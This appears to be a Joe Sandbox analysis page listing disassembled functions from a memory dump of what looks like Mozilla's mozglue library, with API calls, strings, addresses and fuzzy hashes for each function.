Instruction Fuzzy Hash: 075125366003099FDB406BA5E40CBA77BB4EB4F329F140525EE15A3BC0DBB64816C7E6

Function 6C29D010 Relevance: 31.7, APIs: 13, Strings: 5, Instructions: 215COMMON

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32(6C2EE804), ref: 6C29D047
GetSystemInfo.KERNEL32(?), ref: 6C29D093
__Init_thread_footer.LIBCMT ref: 6C29D0A6
GetEnvironmentVariableA.KERNEL32(MALLOC_OPTIONS,6C2EE810,00000040), ref: 6C29D0D0
InitializeCriticalSectionAndSpinCount.KERNEL32(6C2EE7B8,00001388), ref: 6C29D147
InitializeCriticalSectionAndSpinCount.KERNEL32(6C2EE744,00001388), ref: 6C29D162
InitializeCriticalSectionAndSpinCount.KERNEL32(6C2EE784,00001388), ref: 6C29D18D
InitializeCriticalSectionAndSpinCount.KERNEL32(6C2EE7DC,00001388), ref: 6C29D1B1

Strings

: (malloc) Unsupported character in malloc options: ', xrefs: 6C29D322
Compile-time page size does not divide the runtime one., xrefs: 6C29D26D
MOZ_CRASH(), xrefs: 6C29D277
<jemalloc>, xrefs: 6C29D268, 6C29D311
MALLOC_OPTIONS, xrefs: 6C29D0CB

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpin$AcquireEnvironmentExclusiveInfoInit_thread_footerLockSystemVariable
String ID: : (malloc) Unsupported character in malloc options: '$<jemalloc>$Compile-time page size does not divide the runtime one.$MALLOC_OPTIONS$MOZ_CRASH()
API String ID: 2957312145-326518326
Opcode ID: 8e32c218392680b5c38e276f149bacdf6f7965da9c73fc7e41268874975c6884
Instruction ID: 586701b43b62b151fdf2eb7dd8460556152c10e1414047197050383f66a47707
Opcode Fuzzy Hash: 8e32c218392680b5c38e276f149bacdf6f7965da9c73fc7e41268874975c6884
Instruction Fuzzy Hash: 1C81EB70E0420A9BEB40CF6AC958BA977B5EB4E309F54052AFD01B7BC1DB709845CB92

Function 6C277FD0 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 166COMMON

Download Yara Rule

APIs

K32EnumProcessModules.KERNEL32(000000FF,00000000,00000000,?), ref: 6C278007
moz_xmalloc.MOZGLUE(?,000000FF,00000000,00000000,?), ref: 6C27801D

Part of subcall function 6C27CA10: malloc.MOZGLUE(?), ref: 6C27CA26

memset.VCRUNTIME140(00000000,00000000,?,?), ref: 6C27802B
K32EnumProcessModules.KERNEL32(000000FF,00000000,?,?,?,?,?,?), ref: 6C27803D
moz_xmalloc.MOZGLUE(00000104,000000FF,00000000,?,?,?,?,?,?), ref: 6C27808D

Part of subcall function 6C27CA10: mozalloc_abort.MOZGLUE(?), ref: 6C27CAA2

memset.VCRUNTIME140(00000000,00000000,00000104,?,?,?,?,?), ref: 6C27809B
GetModuleFileNameW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 6C2780B9
moz_xmalloc.MOZGLUE(?,?,?,?,?,?,?,?,?,?), ref: 6C2780DF
memset.VCRUNTIME140(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 6C2780ED
wcscpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C2780FB
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C27810D
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?), ref: 6C278133
free.MOZGLUE(00000000,000000FF,00000000,?,?,?,?,?,?), ref: 6C278149
free.MOZGLUE(00000000,?,?,?,?,?,?,?,?), ref: 6C278167
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 6C27817C
free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C278199

Strings

0>*l, xrefs: 6C27811E

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: free$memsetmoz_xmalloc$EnumModulesProcess$ErrorFileLastModuleNamemallocmozalloc_abortwcscpy_s
String ID: 0>*l
API String ID: 2721933968-3572829820
Opcode ID: 32c97520c81fed9988617399a93ac1948a0b6ce86a6ddfe8497a9e9bbd9f1c28
Instruction ID: dcd34d0df239eea493da52ce5bf254939ba23d9245b7a4479676096fdfe00ce9
Opcode Fuzzy Hash: 32c97520c81fed9988617399a93ac1948a0b6ce86a6ddfe8497a9e9bbd9f1c28
Instruction Fuzzy Hash: 4A5164B1E002195BDF10DFA9DC84AAFB7B9AF59664F240125EC15F7781E730A904CBB1

Function 6C275E60 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 182threadstringtimeCOMMON

Download Yara Rule

APIs

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C275E9D

Part of subcall function 6C285B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C2856EE,?,00000001), ref: 6C285B85
Part of subcall function 6C285B50: EnterCriticalSection.KERNEL32(6C2EF688,?,?,?,6C2856EE,?,00000001), ref: 6C285B90
Part of subcall function 6C285B50: LeaveCriticalSection.KERNEL32(6C2EF688,?,?,?,6C2856EE,?,00000001), ref: 6C285BD8
Part of subcall function 6C285B50: GetTickCount64.KERNEL32 ref: 6C285BE4

GetCurrentThreadId.KERNEL32 ref: 6C275EAB
GetCurrentThreadId.KERNEL32 ref: 6C275EB8
strlen.API-MS-WIN-CRT-STRING-L1-1-0(GeckoMain,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C275ECF
memcpy.VCRUNTIME140(00000000,GeckoMain,00000000), ref: 6C276017

Part of subcall function 6C264310: moz_xmalloc.MOZGLUE(00000010,?,6C2642D2), ref: 6C26436A
Part of subcall function 6C264310: memcpy.VCRUNTIME140(00000023,?,?,?,?,6C2642D2), ref: 6C264387

moz_xmalloc.MOZGLUE(00000004), ref: 6C275F47
GetCurrentProcess.KERNEL32 ref: 6C275F53
GetCurrentThread.KERNEL32 ref: 6C275F5C
GetCurrentProcess.KERNEL32 ref: 6C275F66
DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 6C275F7E
moz_xmalloc.MOZGLUE(00000024), ref: 6C275F27

Part of subcall function 6C27CA10: mozalloc_abort.MOZGLUE(?), ref: 6C27CAA2

moz_xmalloc.MOZGLUE(00000040,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C2755E1), ref: 6C275E8C

Part of subcall function 6C27CA10: malloc.MOZGLUE(?), ref: 6C27CA26

moz_xmalloc.MOZGLUE(00000050,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C2755E1), ref: 6C27605D
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C2755E1), ref: 6C2760CC

Strings

GeckoMain, xrefs: 6C275ECE, 6C276015

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: Currentmoz_xmalloc$Thread$CriticalProcessSectionmemcpy$Count64CounterDuplicateEnterHandleLeaveNow@PerformanceQueryStamp@mozilla@@TickTimeV12@_freemallocmozalloc_abortstrlen
String ID: GeckoMain
API String ID: 3711609982-966795396
Opcode ID: 6a1eec37f5b6210daa1e0685bed0b769cb0a2268f1dfdbd95a4c61caf94a571b
Instruction ID: 09cce48056be65648251d86c24deabefb35534bc75fdd112453e70e6fe4513eb
Opcode Fuzzy Hash: 6a1eec37f5b6210daa1e0685bed0b769cb0a2268f1dfdbd95a4c61caf94a571b
Instruction Fuzzy Hash: 0871CFB0A057448FD750DF24C4C4A6ABBF0BF5A304F54492DEC8687B92DB31E848CBA2

Function 6C279590 Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 192libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6C2631C0: LoadLibraryW.KERNEL32(KernelBase.dll), ref: 6C263217
Part of subcall function 6C2631C0: GetProcAddress.KERNEL32(00000000,QueryInterruptTime), ref: 6C263236
Part of subcall function 6C2631C0: FreeLibrary.KERNEL32 ref: 6C26324B
Part of subcall function 6C2631C0: __Init_thread_footer.LIBCMT ref: 6C263260
Part of subcall function 6C2631C0: ?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(?), ref: 6C26327F
Part of subcall function 6C2631C0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C26328E
Part of subcall function 6C2631C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C2632AB
Part of subcall function 6C2631C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C2632D1
Part of subcall function 6C2631C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C2632E5
Part of subcall function 6C2631C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C2632F7

LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6C279675
__Init_thread_footer.LIBCMT ref: 6C279697
LoadLibraryW.KERNEL32(ntdll.dll), ref: 6C2796E8
GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6C279707
__Init_thread_footer.LIBCMT ref: 6C27971F
SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C279773
GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6C2797B7
FreeLibrary.KERNEL32 ref: 6C2797D0
FreeLibrary.KERNEL32 ref: 6C2797EB
SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C279824

Strings

NtMapViewOfSection, xrefs: 6C279701
MapViewOfFileNuma2, xrefs: 6C2797B1
ntdll.dll, xrefs: 6C2796E3
Api-ms-win-core-memory-l1-1-5.dll, xrefs: 6C279670

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: LibraryTime$StampV01@@Value@mozilla@@$AddressFreeInit_thread_footerLoadProc$ErrorLastStamp@mozilla@@$Creation@Now@ProcessV12@V12@_
String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
API String ID: 3361784254-3880535382
Opcode ID: 5fd8faeeed11160c3b5fd1c95b9a8e947890f9289fc6d9aa955120b5eebe2f3a
Instruction ID: d2489b959a349d9f8f737e074e1fa48c6a96bbaeb67ade0ea270eb8711e62a09
Opcode Fuzzy Hash: 5fd8faeeed11160c3b5fd1c95b9a8e947890f9289fc6d9aa955120b5eebe2f3a
Instruction Fuzzy Hash: 6861C3B160030A9BDF10DF6AE888B9B7BB1EB4E315F004529FD15A7BC0D7349854CBA1

Function 6C2711B0 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 186COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\ProxyStubClsid32,00000084), ref: 6C271213
toupper.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C271285
memcpy.VCRUNTIME140(?,TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32,00000076), ref: 6C2712B9
memcpy.VCRUNTIME140(?,CLSID\{03022430-ABC4-11D0-BDE2-00AA001A1953}\InProcServer32,00000078,?), ref: 6C271327

Strings

MZx, xrefs: 6C2711E1
CLSID\{03022430-ABC4-11D0-BDE2-00AA001A1953}\InProcServer32, xrefs: 6C27131B
TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32, xrefs: 6C2712AD
Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\ProxyStubClsid32, xrefs: 6C27120D
&, xrefs: 6C27126B

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: memcpy$toupper
String ID: &$CLSID\{03022430-ABC4-11D0-BDE2-00AA001A1953}\InProcServer32$Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\ProxyStubClsid32$MZx$TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32
API String ID: 403083179-3658087426
Opcode ID: 505f23ebedbf0cabc7d50aeb86912026893abe6175bfe271fa78d1453b767a52
Instruction ID: 096607c5761dc07952d50cd86eb8e04725eec558349006bb897705357cda6ae1
Opcode Fuzzy Hash: 505f23ebedbf0cabc7d50aeb86912026893abe6175bfe271fa78d1453b767a52
Instruction Fuzzy Hash: 0871C471E0535D8ADB209F64C8647DEB7F5BF44309F04065AD849B3B80DB74AAC8CBA2

Function 6C2C6660 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 162threadCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(6C2EF618), ref: 6C2C6694
GetThreadId.KERNEL32(?), ref: 6C2C66B1
GetCurrentThreadId.KERNEL32 ref: 6C2C66B9
memset.VCRUNTIME140(?,00000000,00000100), ref: 6C2C66E1
EnterCriticalSection.KERNEL32(6C2EF618), ref: 6C2C6734
GetCurrentProcess.KERNEL32 ref: 6C2C673A
LeaveCriticalSection.KERNEL32(6C2EF618), ref: 6C2C676C
GetCurrentThread.KERNEL32 ref: 6C2C67FC
memset.VCRUNTIME140(?,00000000,000002C8), ref: 6C2C6868
RtlCaptureContext.NTDLL ref: 6C2C687F

Strings

WalkStack64, xrefs: 6C2C6890

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: CriticalCurrentSectionThread$memset$CaptureContextEnterInitializeLeaveProcess
String ID: WalkStack64
API String ID: 2357170935-3499369396
Opcode ID: 2b4c434980e944b597c4517c052819139b3c5b3f9c2e43f32fcd218761cc829d
Instruction ID: ad9d473b3741ee61d14e130f9403dfd054b46f2191f31c176d87cbb97bb80c4a
Opcode Fuzzy Hash: 2b4c434980e944b597c4517c052819139b3c5b3f9c2e43f32fcd218761cc829d
Instruction Fuzzy Hash: 9A519F71A09305AFDB51CF24C888A6ABBF4FF8D714F044A2DFD9997640D770A918CB92

Function 6C2ADE60 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 135threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C2A9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C274A68), ref: 6C2A945E
Part of subcall function 6C2A9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C2A9470
Part of subcall function 6C2A9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C2A9482
Part of subcall function 6C2A9420: __Init_thread_footer.LIBCMT ref: 6C2A949F

GetCurrentThreadId.KERNEL32 ref: 6C2ADE73
GetCurrentThreadId.KERNEL32 ref: 6C2ADF7D
AcquireSRWLockExclusive.KERNEL32(6C2EF4B8), ref: 6C2ADF8A
ReleaseSRWLockExclusive.KERNEL32(6C2EF4B8), ref: 6C2ADFC9
GetCurrentThreadId.KERNEL32 ref: 6C2ADFF7
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C2AE000
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,6C274A68), ref: 6C2ADE7B

Part of subcall function 6C2A94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C2A94EE
Part of subcall function 6C2A94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C2A9508

Part of subcall function 6C29CBE8: GetCurrentProcess.KERNEL32(?,6C2631A7), ref: 6C29CBF1
Part of subcall function 6C29CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C2631A7), ref: 6C29CBFA

?RegisterProfilerLabelEnterExit@mozilla@@YAXP6APAXPBD0PAX@ZP6AX1@Z@Z.MOZGLUE(00000000,00000000,?,?,?,6C274A68), ref: 6C2ADEB8
free.MOZGLUE(00000000,?,6C274A68), ref: 6C2ADEFE
?ReleaseBufferForMainThreadAddMarker@base_profiler_markers_detail@mozilla@@YAXXZ.MOZGLUE ref: 6C2ADF38

Strings

[I %d/%d] locked_profiler_stop, xrefs: 6C2ADE83
<none>, xrefs: 6C2ADFD7
[I %d/%d] profiler_set_process_name("%s", "%s"), xrefs: 6C2AE00E

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: CurrentThread$getenv$ExclusiveLockProcessRelease_getpid$AcquireBufferEnterExit@mozilla@@Init_thread_footerLabelMainMarker@base_profiler_markers_detail@mozilla@@ProfilerRegisterTerminate__acrt_iob_func__stdio_common_vfprintffree
String ID: <none>$[I %d/%d] locked_profiler_stop$[I %d/%d] profiler_set_process_name("%s", "%s")
API String ID: 1281939033-809102171
Opcode ID: 1b761e049b5734c031578918f9b89ee2acc879afa554d9fc9194113a7f0c4155
Instruction ID: d0a7d0411401359587d034207c90646762cd32878e2db1aee5ee4af1cafde17d
Opcode Fuzzy Hash: 1b761e049b5734c031578918f9b89ee2acc879afa554d9fc9194113a7f0c4155
Instruction Fuzzy Hash: 934129767012099BDB109BA5D80C7AB7775FB8E30DF440015EE05A7B81CBB29906CBE5

Function 6C2BD840 Relevance: 21.2, APIs: 14, Instructions: 206threadtimeCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C2BD85F
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C2BD86C
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C2BD918
GetCurrentThreadId.KERNEL32 ref: 6C2BD93C
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C2BD948
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C2BD970
GetCurrentThreadId.KERNEL32 ref: 6C2BD976
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C2BD982
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C2BD9CF
?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C2BDA2E
GetCurrentThreadId.KERNEL32 ref: 6C2BDA6F
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C2BDA78
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE ref: 6C2BDA91

Part of subcall function 6C285C50: GetTickCount64.KERNEL32 ref: 6C285D40
Part of subcall function 6C285C50: EnterCriticalSection.KERNEL32(6C2EF688), ref: 6C285D67

ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C2BDAB7

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThread$Count64CriticalEnterSectionStampTickTimeV01@@Value@mozilla@@Xbad_function_call@std@@
String ID:
API String ID: 1195625958-0
Opcode ID: a60193493f04faa5e9bdc49c08f2150de7e95a8be9d5435abf037752b773d61a
Instruction ID: 71bab63075a289b5540d528d62408b6d3c77aa9c541fa5c0c5005ae6d44e5c92
Opcode Fuzzy Hash: a60193493f04faa5e9bdc49c08f2150de7e95a8be9d5435abf037752b773d61a
Instruction Fuzzy Hash: 6F71BC35600308DFCB00CF29C888B9ABBB5FF89354F18856DEC5AAB345DB30A844CB95

Function 6C2BD4D0 Relevance: 21.2, APIs: 14, Instructions: 165threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C2BD4F0
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C2BD4FC
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C2BD52A
GetCurrentThreadId.KERNEL32 ref: 6C2BD530
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C2BD53F
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C2BD55F
free.MOZGLUE(00000000), ref: 6C2BD585
?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C2BD5D3
GetCurrentThreadId.KERNEL32 ref: 6C2BD5F9
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C2BD605
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C2BD652
GetCurrentThreadId.KERNEL32 ref: 6C2BD658
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C2BD667
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C2BD6A2

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThread$Xbad_function_call@std@@free
String ID:
API String ID: 2206442479-0
Opcode ID: 85faf03a0294c976aa1c71f964f0a9592044d8d50de33c2d23645909661e4e2a
Instruction ID: 51811579b1f779cdc1d65302db7bbf5f0221baa7b92cf50477bbd2c8efb6f1de
Opcode Fuzzy Hash: 85faf03a0294c976aa1c71f964f0a9592044d8d50de33c2d23645909661e4e2a
Instruction Fuzzy Hash: 2E518D75604709DFC704CF25C888A9ABBB4FF8D358F008A2EE85A97750DB30A844CB95

Function 6C261E90 Relevance: 19.6, APIs: 9, Strings: 4, Instructions: 120COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C2EE784), ref: 6C261EC1
LeaveCriticalSection.KERNEL32(6C2EE784), ref: 6C261EE1
EnterCriticalSection.KERNEL32(6C2EE744), ref: 6C261F38
LeaveCriticalSection.KERNEL32(6C2EE744), ref: 6C261F5C
VirtualFree.KERNEL32(?,00100000,00004000), ref: 6C261F83
LeaveCriticalSection.KERNEL32(6C2EE784), ref: 6C261FC0
EnterCriticalSection.KERNEL32(6C2EE784), ref: 6C261FE2
LeaveCriticalSection.KERNEL32(6C2EE784), ref: 6C261FF6
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C262019

Strings

D.l, xrefs: 6C261F56
D.l, xrefs: 6C261F32
\.l, xrefs: 6C261F3E
MOZ_CRASH(), xrefs: 6C262000

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: CriticalSection$Leave$Enter$FreeVirtualmemset
String ID: D.l$D.l$MOZ_CRASH()$\.l
API String ID: 2055633661-2387373223
Opcode ID: a1b7486511101f956c663b0cb440658b2e8b69f40914cabc5f5f7ba7b0a1b0f6
Instruction ID: 032e42a14c86a0594505552d634b81b2b49e15e658bc2ce977d93c34e3b45875
Opcode Fuzzy Hash: a1b7486511101f956c663b0cb440658b2e8b69f40914cabc5f5f7ba7b0a1b0f6
Instruction Fuzzy Hash: 7F41B3B1B0031E8BDB509F6AC888B6A76B5EF4D309F440025FD15A7B85DB71A884CBE5

Function 6C285670 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 272timeCOMMON

Download Yara Rule

APIs

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_APP_RESTART), ref: 6C2856D1
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C2856E9
?ComputeProcessUptime@TimeStamp@mozilla@@CA_KXZ.MOZGLUE ref: 6C2856F1
?TicksFromMilliseconds@BaseTimeDurationPlatformUtils@mozilla@@SA_JN@Z.MOZGLUE ref: 6C285744
??0TimeStampValue@mozilla@@AAE@_K0_N@Z.MOZGLUE(?,?,?,?,?), ref: 6C2857BC
GetTickCount64.KERNEL32 ref: 6C2858CB
EnterCriticalSection.KERNEL32(6C2EF688), ref: 6C2858F3
__aulldiv.LIBCMT ref: 6C285945
LeaveCriticalSection.KERNEL32(6C2EF688), ref: 6C2859B2
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(6C2EF638,?,?,?,?), ref: 6C2859E9

Strings

MOZ_APP_RESTART, xrefs: 6C2856CC

